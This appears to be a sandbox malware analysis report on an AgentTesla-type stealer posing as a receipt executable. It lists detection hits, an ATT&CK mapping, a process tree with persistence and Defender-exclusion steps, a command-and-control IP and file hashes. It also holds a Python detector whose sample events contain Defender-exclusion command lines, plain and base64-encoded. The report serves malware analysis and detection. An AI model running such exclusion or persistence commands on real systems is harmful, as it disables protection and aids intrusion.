            Source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007563000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4100928252.00000000011C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct (54 identical entries in the report)

            Stealing of Sensitive Information

            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Receipt-#202431029B.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 8064, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 5260, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Receipt-#202431029B.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 8064, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 5260, type: MEMORYSTR
MITRE ATT&CK matrix (reconstructed from the flattened table: one line per tactic column; bracketed digits are the report's signature-count badges on matched techniques, techniques without a badge had no signature hit in this analysis)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [11]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [2]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection [111]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [2]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [141]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [21]; Software Packing [22]; Timestomp [1]; DLL Side-Loading [1]
Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery [231]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Input Capture [1]; Archive Collected Data [11]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Application Layer Protocol [1]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1582779  Sample: Receipt-#202431029B.exe  Start date: 31/12/2024  Architecture: WINDOWS  Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 15 other signatures

Process tree (reconstructed from the flattened behavior graph):

Receipt-#202431029B.exe (started)
  dropped: C:\Users\user\AppData\Roaming\XetHVID.exe (PE32)
  dropped: C:\Users\user\...\XetHVID.exe:Zone.Identifier (ASCII)
  dropped: C:\Users\user\AppData\Local\...\tmp2668.tmp (XML)
  dropped: C:\Users\user\...\Receipt-#202431029B.exe.log (ASCII)
  signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
  +- Receipt-#202431029B.exe (second instance)
  |    network: 154.39.0.150, ports 49735, 49736, 49742 (COGENT-174US, United States)
  |    dropped: C:\Users\user\AppData\Roaming\Notepab.exe (PE32)
  |    +- WerFault.exe
  +- powershell.exe
  |    signature: Loading BitLocker PowerShell Module
  |    +- conhost.exe
  |    +- WmiPrvSE.exe
  +- powershell.exe
  |    +- conhost.exe
  +- schtasks.exe
       +- conhost.exe
XetHVID.exe (started)
  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  +- schtasks.exe
  |    +- conhost.exe
  +- XetHVID.exe
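The chain in the behavior graph (the sample spawning powershell.exe to add a Defender exclusion, schtasks.exe registering a task from a dropped temp XML, and a second executable launched from AppData\Roaming) is what a host-based detection should key on. The following Python is an added example and not code from the Joe Sandbox report: the events are constructed to mirror that chain in Sysmon process-creation field names (the full temp path, the task name, the exact command lines and every PID other than 7552 and 8064 are assumptions, not values from the report), and it goes beyond this section by also decoding the -EncodedCommand form of the PowerShell invocation.

```python
"""Detection for the persistence / defence-evasion chain in the behavior graph.

Added example, not code from the Joe Sandbox report.  The events below are
constructed to mirror the chain the graph shows: the sample spawning
powershell.exe to add a Defender exclusion, schtasks.exe registering a task
from a temp XML file, and a second executable run from the AppData Roaming
folder.  Field names follow the Sysmon process-creation (Event ID 1) schema.
"""
import base64
import re
from typing import Dict, Iterable, List, Optional, Tuple

SAMPLE = r"C:\Users\user\Desktop\Receipt-#202431029B.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\XetHVID.exe"
# Assumed full path: the report only shows C:\Users\user\AppData\Local\...\tmp2668.tmp
TEMP_XML = r"C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (PIDs other than 7552 and 8064, the task name and the
# exact command lines are assumptions, not values taken from the report).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "7552", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": SAMPLE, "CommandLine": f'"{SAMPLE}"'},
    # Defender exclusion as a plain cmdlet ...
    {"ProcessId": "7700", "ParentImage": SAMPLE, "Image": PS_EXE,
     "CommandLine": f'powershell.exe Add-MpPreference -ExclusionPath "{SAMPLE}"'},
    # ... and the same intent hidden behind -EncodedCommand
    {"ProcessId": "7704", "ParentImage": SAMPLE, "Image": PS_EXE,
     "CommandLine": "powershell.exe -EncodedCommand "
                    + encode_ps(f"Add-MpPreference -ExclusionPath '{DROPPED}'")},
    {"ProcessId": "7708", "ParentImage": SAMPLE,
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": f'schtasks.exe /Create /TN "Updater" /XML "{TEMP_XML}"'},
    {"ProcessId": "8064", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": DROPPED, "CommandLine": f'"{DROPPED}"'},
    # Benign control: a task registered from an XML outside any temp directory
    {"ProcessId": "9000", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /TN Backup /XML "C:\ProgramData\backup.xml"'},
]

# -e, -ec, -enc, ... -EncodedCommand: PowerShell accepts any unambiguous prefix.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)",
                       re.IGNORECASE | re.DOTALL)
SCHTASKS_XML_RE = re.compile(r'/xml\s+"?([^"]+?\.(?:xml|tmp))"?', re.IGNORECASE)
TEMP_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Temp)\\", re.IGNORECASE)
ROAMING_EXE_RE = re.compile(r"\\AppData\\Roaming\\[^\\]+\.exe$", re.IGNORECASE)


def decode_powershell(cmdline: str) -> str:
    """Return the script PowerShell would actually run (decodes -EncodedCommand)."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not a real payload; inspect the raw command line instead


def is_defender_exclusion(cmdline: str) -> bool:
    """True when the (decoded) command adds or sets a Defender exclusion."""
    return MPPREF_RE.search(decode_powershell(cmdline)) is not None


def temp_task_xml(cmdline: str) -> Optional[str]:
    """Path of the task XML when schtasks /Create reads it from a temp directory."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    m = SCHTASKS_XML_RE.search(cmdline)
    if m and TEMP_RE.search(m.group(1)):
        return m.group(1)
    return None


def is_roaming_exe(image: str) -> bool:
    """True for executables launched directly from the AppData Roaming folder."""
    return ROAMING_EXE_RE.search(image) is not None


def triage(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (ProcessId, rule) hits; one process can hit more than one rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        pid, image, cmd = ev["ProcessId"], ev["Image"], ev["CommandLine"]
        if image.lower().endswith("powershell.exe") and is_defender_exclusion(cmd):
            hits.append((pid, "defender_exclusion"))
        if temp_task_xml(cmd):
            hits.append((pid, "schtasks_temp_xml"))
        if is_roaming_exe(image):
            hits.append((pid, "exe_from_appdata_roaming"))
    return hits


if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(pid, rule)
```

Run against the constructed events, triage() flags both PowerShell launches (plain and encoded), the schtasks call whose /XML sits under a Temp directory, and the XetHVID.exe launch from AppData\Roaming, while the benign schtasks control with its XML under ProgramData produces no hit. Decoding the -EncodedCommand payload before matching is the step that keeps the Add-MpPreference rule from being bypassed by the encoded form.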

Antivirus detection, initial sample (Source / Detection / Scanner / Label):
Receipt-#202431029B.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Receipt-#202431029B.exe | 43% | Virustotal | (Browse link)
Receipt-#202431029B.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files (Source / Detection / Scanner / Label):
C:\Users\user\AppData\Roaming\XetHVID.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Notepab.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Notepab.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\XetHVID.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
            No Antivirus matches
            No Antivirus matches
Antivirus detection, contacted IPs (Source / Detection / Scanner / Label):
154.39.0.150 | 0% | Avira URL Cloud | safe
            No contacted domains info
Contacted IPs (Name / Malicious / Antivirus Detection / Reputation):
154.39.0.150 | true | Avira URL Cloud: safe | unknown
URLs found in memory (Name / Source / Malicious / Reputation). Every entry below is flagged malicious: false with reputation: high. Unless noted otherwise the source is Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp; URL strings are reproduced exactly as the report lists them.

http://www.apache.org/licenses/LICENSE-2.0
http://www.fontbureau.com
http://www.fontbureau.com/designersG
http://www.fontbureau.com/designers/?
http://www.founder.com.cn/cn/bThe
http://www.fontbureau.com/designers?
http://www.tiro.com
http://www.fontbureau.com/designers
http://www.goodfont.co.kr
http://www.carterandcone.coml
http://www.sajatypeworks.com
http://www.typography.netD
http://www.fontbureau.com/designers/cabarga.htmlN
http://www.founder.com.cn/cn/cThe
http://www.galapagosdesign.com/staff/dennis.htm
http://www.founder.com.cn/cn
http://www.fontbureau.com/designers/frere-user.html
http://www.jiyu-kobo.co.jp/
http://www.galapagosdesign.com/DPlease
http://www.fontbureau.com/designers8
http://www.fonts.com
http://www.sandoll.co.kr
http://www.urwpp.deDPlease
http://www.zhongyicts.com.cn
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (sources: Receipt-#202431029B.exe, 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp; Receipt-#202431029B.exe, 00000008.00000002.4102389943.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp; XetHVID.exe, 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp)
http://www.sakkal.com
Contacted IPs (IP / Domain / Country / ASN / ASN Name / Malicious):
154.39.0.150 | unknown | United States | 174 | COGENT-174US | true
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1582779
                                                                Start date and time:2024-12-31 13:28:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 9s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Receipt-#202431029B.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@20/21@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 366
                                                                • Number of non-executed functions: 12
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45, 40.126.32.72
                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target XetHVID.exe, PID 5260 because it is empty
                                                                • Not all processes were analyzed; report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                Time | Type | Description
                                                                07:28:53 | API Interceptor | 8729105x Sleep call for process: Receipt-#202431029B.exe modified
                                                                07:28:55 | API Interceptor | 37x Sleep call for process: powershell.exe modified
                                                                07:28:58 | API Interceptor | 17x Sleep call for process: XetHVID.exe modified
                                                                12:28:56 | Task Scheduler | Run new task: XetHVID path: C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                12:29:03 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnk
                                                                Match: COGENT-174US
                                                                Associated Sample Name / URL | Detection | Threat Name | Context
                                                                arm.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                m68k.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                ppc.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                mpsl.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                debug.dbg.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                x86_64.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                arm7.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                sh4.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                mips.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                spc.elf | malicious | Mirai, Moobot | 38.55.246.3
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 12:32:53 2024, 0x1205a4 type
                                                                Category:dropped
                                                                Size (bytes):370505
                                                                Entropy (8bit):3.6848277277009753
                                                                Encrypted:false
                                                                SSDEEP:3072:Y+uW7MJ1hew7UHT34uEqZQFIyyA/LTgHCfGUUc49drhE:Y+uAMfetz343FIyyATTgPKh
                                                                MD5:94DFF6297644B5C414047A372DEED0BE
                                                                SHA1:8C12C2A13063C53B2D75468126A63420CFC6B30A
                                                                SHA-256:2F98B70B27751F4017C972453CAAC97552F6B9992C3B52867B17A2E22001AD1D
                                                                SHA-512:E8E60C339CC0EEFCD9FAD4F6CC9690515AE709186CDD9D1877C13F80C2F2792852BE5DA8A7C2E17124553EED843B66629454208935F6CACD365825C63FA14258
                                                                Malicious:false
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):6432
                                                                Entropy (8bit):3.7184687860196703
                                                                Encrypted:false
                                                                SSDEEP:96:RSIU6o7wVetbyAxU/V6/jMYZQxUUaNQE/n3h5aM4UI89bPzxsf4k9rm:R6l7wVeJylV64YZVTprI89b7xsf4kJm
                                                                MD5:80DF393D66E44CC23B02CDEDC05B1EFC
                                                                SHA1:C8CD588CACBA1AB6A22C09A45442943D7FBE6D8D
                                                                SHA-256:A1BBF9A501B20D2BE6DAAAB09BB5EC43EA6C74DA80EBA5E941BA8A97C79BC67A
                                                                SHA-512:750008B2A47907A8051B49EBB8E7C7B2001C70AC2682804FA6220B0AC6F473DA2E1FB22A4434E7F672F54727A44D8C135AC8ED0CE1C1E5F4352508156AE88B69
                                                                Malicious:false
                                                                Preview (decoded from UTF-16):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>8004</Pi
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4782
                                                                Entropy (8bit):4.477571813430474
                                                                Encrypted:false
                                                                SSDEEP:48:cvIwWl8zsgJg77aI9ndSWpW8VYTYm8M4JMWFcnTL+q8v3kRE8Nydd:uIjfmI79F7V3JuTLKgEeydd
                                                                MD5:5815945E4DDD1C582B371D8F783D401D
                                                                SHA1:56D8758566DEF431C5F6DB95D37D81D8E97371E6
                                                                SHA-256:138AC3506B017D9DD78A91DFE74A6DABA6E9F261F32CB40380843D469D750CE8
                                                                SHA-512:3EE4EB7649EF46B3FDD0769742CA0387D4208DB92FEB934ACE92D4CDAE19D376CAAA08891CA9B74DCD9F1413599958DD03CC94D73EB34977EEDD5F98E3CA8A7D
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655415" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1415
                                                                Entropy (8bit):5.352427679901606
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                MD5:97AD91F1C1F572C945DA12233082171D
                                                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                Process:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1415
                                                                Entropy (8bit):5.352427679901606
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                MD5:97AD91F1C1F572C945DA12233082171D
                                                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):2232
                                                                Entropy (8bit):5.379736180876081
                                                                Encrypted:false
                                                                SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:tLHyIFKL3IZ2KRH9Ougss
                                                                MD5:84D0B3B07B2FABFD5D0F3E724F41E2CE
                                                                SHA1:8CB94823F1D28AA12678C877E2E1CF0D57CE5C69
                                                                SHA-256:9F2745B3228D5DCFA4E9B4659F5A2A58A3446B7AECD20294BA34BF3A0312E0E3
                                                                SHA-512:DAE272A0BB99FAB9A217FD4B448DE9847795636777DE9BA769A087DA5505BBCD5B5C29EE48C1241735A4F4AC9EF61E393B859C138D1F6244DF317A664D93375F
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
